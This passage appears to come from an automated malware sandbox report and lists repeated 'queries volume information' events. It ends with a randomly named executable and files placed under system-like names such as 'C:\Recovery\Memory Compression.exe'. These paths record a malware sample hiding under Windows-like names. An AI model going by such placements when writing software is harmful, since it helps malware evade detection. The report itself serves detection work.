                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeQueries volume information: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeQueries volume information: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\Memory Compression.exeQueries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
                                    Source: C:\Recovery\Memory Compression.exeQueries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\ChainbrowserNet\serverDll.exe VolumeInformation
